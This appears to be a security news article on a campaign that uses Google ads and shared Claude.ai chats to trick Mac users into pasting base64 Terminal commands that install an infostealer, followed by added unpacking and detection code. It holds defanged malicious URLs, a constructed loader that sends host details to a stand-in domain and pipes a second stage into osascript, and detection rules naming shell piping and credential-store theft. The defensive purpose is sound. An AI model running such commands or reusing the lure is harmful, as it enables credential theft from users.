Thursday, June 25 2026
Claude.ai

Hackers misuse Claude.ai and Google ads chats to spread Mac malware

As AI tooling advances, cyber criminals adapt their attack patterns with it, which keeps raising the bar for cyber resilience. In an active malvertising campaign, attackers are abusing Google Ads together with legitimate Claude.ai shared chats to push malware to macOS users.

Users searching for “Claude mac download” may be served sponsored results that display claude.ai as the destination. The ad really does lead to claude.ai, but to a shared chat whose step-by-step instructions end with malware being installed on the user’s Mac.

Google’s sponsored search result for ‘claude download mac’ (BleepingComputer)

Shared Claude Chats weaponized to target macOS users

The campaign was discovered by Berk Albayrak, a security expert at Trendyol Group, who posted his findings on LinkedIn.

Albayrak found a shared Claude.ai chat posing as an official guide for “Claude Code on Mac,” supposedly from “Apple Support.” The chat walks the reader through opening Terminal and pasting a command that silently downloads and executes malware on their Mac.

Researcher alerts of ongoing advertising campaign

While verifying Albayrak’s findings, BleepingComputer reported landing on a second shared Claude chat that carried out the same attack through entirely separate infrastructure.

The two chats follow an identical structure and social engineering approach but use different domains and payloads. Both chats were publicly accessible at the time of writing:

Shared Claude Chat with malicious instructions (BleepingComputer)

What does the macOS malware do?

The base64-encoded instructions shown in the shared Claude chats download an encoded shell script from domains such as:

In the variant seen by Albayrak [VirusTotal]: hxxp://customroofingcontractors[.]com/curl/b42a0ed9d1ecb72e42d6034502c304845d98805481d99cea4e259359f9ab206e

In the variant seen by BleepingComputer [VirusTotal]: hxxps://bernasibutuwqu2[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d

The ‘loader.sh’ served by the second link is itself another gzip-compressed set of shell instructions:

Base64 code retrieves first stage ‘loader.sh’ payload (BleepingComputer)

That script is decompressed and executed entirely in memory, leaving little forensic evidence on disk.

BleepingComputer observed that the server returned a differently obfuscated copy of the payload on every request, a technique known as polymorphic delivery. Because no two downloads share the same bytes, security tools cannot block the download by matching a known file hash or static signature; detection has to key on the decoded content or on behaviour instead.
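The practical consequence of polymorphic delivery is that hashing the blob you pasted or downloaded proves nothing, while the script underneath is often identical from one request to the next. The following is an added example (not code from BleepingComputer, Albayrak or the campaign): a static unpacker that peels the `echo '<base64>' | base64 -d | gunzip | bash` style layers without executing anything, extracts URLs and interpreter pipes from the decoded script, and hashes a comment-stripped form of it. The loader text, the `example.invalid` domains and the wrapper format are constructed stand-ins, not the real campaign’s artifacts; `wrap_polymorphic` merely simulates a server that varies junk comments and the gzip header per request.

```python
"""Static unpacker for "paste this into Terminal" loaders.

Added example (not code from BleepingComputer, Albayrak or the campaign).
It peels the base64/gzip layers WITHOUT executing anything and shows why a
hash of the downloaded blob is useless against polymorphic delivery: two
differently encoded wrappers hash differently, yet decode to the same script.
The loader text, domains and wrapper format below are constructed stand-ins.
"""
import base64
import gzip
import hashlib
import re

# Constructed stand-in for a decoded loader (NOT the real one): profile the
# host, then fetch a second stage and hand it to osascript on stdin.
FAKE_LOADER = b"""#!/bin/bash
ip=$(curl -s https://example.invalid/ip)
host=$(hostname)
curl -s "https://example.invalid/stage2?ip=$ip&host=$host" | osascript -
"""

# echo '<base64>' | base64 -d   (also the macOS -D / GNU --decode spellings)
ECHO_B64_RE = re.compile(
    rb"""echo\s+['"]?([A-Za-z0-9+/=]{16,})['"]?\s*\|\s*base64\s+(?:-d|-D|--decode)"""
)
URL_RE = re.compile(rb"""https?://[^\s'")]+""")


def wrap_polymorphic(script: bytes, nonce: int) -> bytes:
    """Server-side view (constructed): same script, different bytes per request.
    A junk comment plus a varying gzip mtime change the blob; the logic does not."""
    junk = hashlib.sha256(nonce.to_bytes(8, "big")).hexdigest().encode()
    gz = gzip.compress(script + b"# " + junk + b"\n", mtime=nonce)
    return b"echo '" + base64.b64encode(gz) + b"' | base64 -d | gunzip | bash\n"


def peel(blob: bytes, max_depth: int = 8):
    """Strip gzip and base64 layers recursively. Decodes only; never executes."""
    layers = []
    for _ in range(max_depth):
        if blob.startswith(b"\x1f\x8b"):                       # gzip magic
            blob, layers = gzip.decompress(blob), layers + ["gzip"]
            continue
        m = ECHO_B64_RE.search(blob)                          # echo '<b64>' | base64 -d
        if m:
            blob, layers = base64.b64decode(m.group(1)), layers + ["base64"]
            continue
        body = blob.strip()                                   # bare base64 blob
        if len(body) >= 16 and re.fullmatch(rb"[A-Za-z0-9+/=\s]+", body):
            blob, layers = base64.b64decode(body), layers + ["base64"]
            continue
        break
    return blob, layers


def normalize(script: bytes) -> bytes:
    """Drop blank and comment-only lines (shebang included) so junk padding
    does not perturb the hash of what actually runs."""
    lines = [ln.strip() for ln in script.splitlines()]
    return b"\n".join(ln for ln in lines if ln and not ln.startswith(b"#"))


def extract_iocs(script: bytes) -> dict:
    """Content-based indicators that survive re-encoding of the wrapper."""
    return {
        "urls": sorted({u.decode("utf-8", "replace") for u in URL_RE.findall(script)}),
        "osascript": b"osascript" in script,
        "pipes_to_interpreter": re.search(rb"\|\s*(?:(?:ba|z)?sh|osascript)\b", script) is not None,
    }


def analyze(command: bytes) -> dict:
    """Decode a pasted command end to end and report hashes plus indicators."""
    script, layers = peel(command)
    return {
        "layers": layers,
        "raw_sha256": hashlib.sha256(command).hexdigest(),
        "normalized_sha256": hashlib.sha256(normalize(script)).hexdigest(),
        "iocs": extract_iocs(script),
        "script": script.decode("utf-8", "replace"),
    }


if __name__ == "__main__":
    a, b = wrap_polymorphic(FAKE_LOADER, 1), wrap_polymorphic(FAKE_LOADER, 2)
    ra, rb = analyze(a), analyze(b)
    print("raw hashes match:       ", ra["raw_sha256"] == rb["raw_sha256"])
    print("normalized hashes match:", ra["normalized_sha256"] == rb["normalized_sha256"])
    print("layers:", ra["layers"], "iocs:", ra["iocs"])
```

Run as-is it prints `False` for the raw hashes and `True` for the normalized ones. Feed a real pasted command to `analyze()` and block on the URLs and the normalized hash rather than on the blob; the decoded script is also what to hand to a sandbox, never the wrapper.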

The variant BleepingComputer identified first checks whether the machine has Russian or other CIS-region keyboard input sources configured. If it does, the script exits without doing anything, sending a quiet ‘cis_blocked’ status ping to the attacker’s server on the way out. Only machines that pass this check receive the next stage:

Shell script runs macOS malware (BleepingComputer)

Before going further, the script gathers the victim’s external IP address, hostname, OS version and keyboard settings and sends them to the attacker. Profiling the victim before delivering the payload shows the attackers are selective about whom they target.

The script then downloads a second-stage payload and runs it with osascript, macOS’s built-in AppleScript and JavaScript-for-Automation interpreter. That lets the attacker execute remotely fetched code without dropping a conventional app or Mach-O binary on disk.

The variant found by Albayrak appears to skip the profiling steps and goes straight to execution. It collects browser usernames and passwords, cookies and macOS Keychain data, bundles them and exfiltrates them to the attacker’s server. Albayrak identified it as a variant of the MacSync macOS infostealer:

Albayrak’s variant skips user fingerprinting step (BleepingComputer)

The briskinternet[.]com domain used by the variant identified by Albayrak appeared to be down at the time of writing.
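Because the wrapper changes on every download, the reliable place to catch this chain is process telemetry: a Terminal-spawned shell decoding base64 into another shell, curl piped into an interpreter, osascript being fed a script on stdin, and a process reading browser credential stores or the login keychain. The following is an added example (not code from BleepingComputer or the report) that runs those rules over a handful of constructed, JSON-lines EDR-style process events. The field names (`pid`, `ppid`, `proc`, `cmdline`), every event, and the `example.invalid` domain are constructed; the Chrome and Homebrew lines are there to show that ordinary Terminal use does not fire.

```python
"""Process-telemetry detection for the macOS delivery chain described above.

Added example (not code from BleepingComputer or the report). Runs behavioural
rules over constructed, JSON-lines EDR-style process events. Field names and
every event are constructed; pid 50 stands for a parent outside the feed.
"""
import json
import re

SHELLS = {"sh", "bash", "zsh"}

# Constructed sample telemetry (not real logs from the campaign).
SAMPLE_EVENTS = r"""
{"pid":101,"ppid":50,"proc":"Terminal","cmdline":"/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal"}
{"pid":102,"ppid":101,"proc":"zsh","cmdline":"zsh -c \"echo 'aGVsbG8gd29ybGQ=' | base64 -d | bash\""}
{"pid":103,"ppid":102,"proc":"curl","cmdline":"curl -s https://example.invalid/debug/loader.sh?build=deadbeef"}
{"pid":104,"ppid":102,"proc":"osascript","cmdline":"osascript -"}
{"pid":105,"ppid":104,"proc":"sh","cmdline":"sh -c \"cp '/Users/victim/Library/Application Support/Google/Chrome/Default/Login Data' /tmp/ld\""}
{"pid":106,"ppid":50,"proc":"Google Chrome","cmdline":"/Applications/Google Chrome.app/Contents/MacOS/Google Chrome"}
{"pid":107,"ppid":101,"proc":"zsh","cmdline":"zsh -c \"brew install jq\""}
"""

# Command-line rules: (name, regex).  Tuned for precision on a dev-heavy fleet,
# so a plain `curl` download without a pipe into an interpreter does not fire.
CMDLINE_RULES = [
    ("decode_pipe_to_shell", re.compile(r"base64\s+(?:-d|-D|--decode)\b.*\|\s*(?:ba|z)?sh\b")),
    ("remote_pipe_to_interpreter", re.compile(r"\bcurl\b.*\|\s*(?:(?:ba|z)?sh|osascript)\b")),
    ("browser_cred_store_access", re.compile(r"Login Data|Cookies|login\.keychain-db")),
]
# osascript fed a script inline (-e) or on stdin (-), rather than a .scpt file
OSASCRIPT_INLINE_RE = re.compile(r"^osascript\s+(?:-e\b|-$)")


def parse_events(text: str) -> list:
    return [json.loads(ln) for ln in text.splitlines() if ln.strip()]


def ancestry(by_pid: dict, pid: int) -> list:
    """Process names from the parent upward, stopping at the feed boundary."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur and cur["ppid"] in by_pid and cur["ppid"] not in seen:
        seen.add(cur["ppid"])
        cur = by_pid[cur["ppid"]]
        chain.append(cur["proc"])
    return chain


def detect(text: str) -> list:
    """Return [{"pid": ..., "rule": ...}] for every event that trips a rule."""
    events = parse_events(text)
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        for name, rx in CMDLINE_RULES:
            if rx.search(e["cmdline"]):
                findings.append({"pid": e["pid"], "rule": name})
        chain = ancestry(by_pid, e["pid"])
        # osascript reading inline/stdin code under a shell that Terminal spawned:
        # the "run the second stage without a binary" step
        if (e["proc"] == "osascript" and OSASCRIPT_INLINE_RE.match(e["cmdline"])
                and chain[:1] and chain[0] in SHELLS and "Terminal" in chain):
            findings.append({"pid": e["pid"], "rule": "osascript_under_terminal_shell"})
        # a shell spawned by osascript: the second stage issuing commands
        if e["proc"] in SHELLS and chain[:1] == ["osascript"]:
            findings.append({"pid": e["pid"], "rule": "shell_child_of_osascript"})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"pid {f['pid']}: {f['rule']}")
```

On the constructed feed this flags the decoding shell (102), the stdin-driven osascript (104) and the credential-store copy (105), and stays silent on Chrome and the Homebrew install. The ancestry check matters: osascript under a Terminal-spawned shell is rare for ordinary users, whereas osascript launched by Automator or an installer is routine.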
